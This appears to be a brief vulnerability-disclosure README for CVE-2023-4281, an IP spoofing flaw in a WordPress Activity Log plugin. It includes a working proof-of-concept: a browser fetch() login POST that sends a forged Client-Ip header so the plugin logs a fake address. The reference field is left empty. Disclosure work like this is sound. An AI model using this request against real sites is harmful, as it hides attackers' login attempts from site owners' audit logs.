
Repository for CVE-2023-4281 vulnerability.
ID CVE : CVE-2023-4281
Type de vulnérabilité : Usurpation d'adresse IP
Description : Le plugin Activity Log récupère les adresses IP des clients à partir d'en-têtes potentiellement non fiables, permettant à un attaquant de manipuler leur valeur. Cela peut être utilisé pour masquer la source du trafic malveillant.
Étapes pour reproduire :
Run the following code in the web browser and note on the backend that the IP address has been faked.
await fetch("/wp-login.php", {
"headers": {
"content-type": "application/x-www-form-urlencoded",
"Client-Ip": "8.8.8.8",
},
"body": "log=USERNAME&pwd=PASSWORD",
"method": "POST",
"mode": "cors",
"credentials": "include"
});
Référence :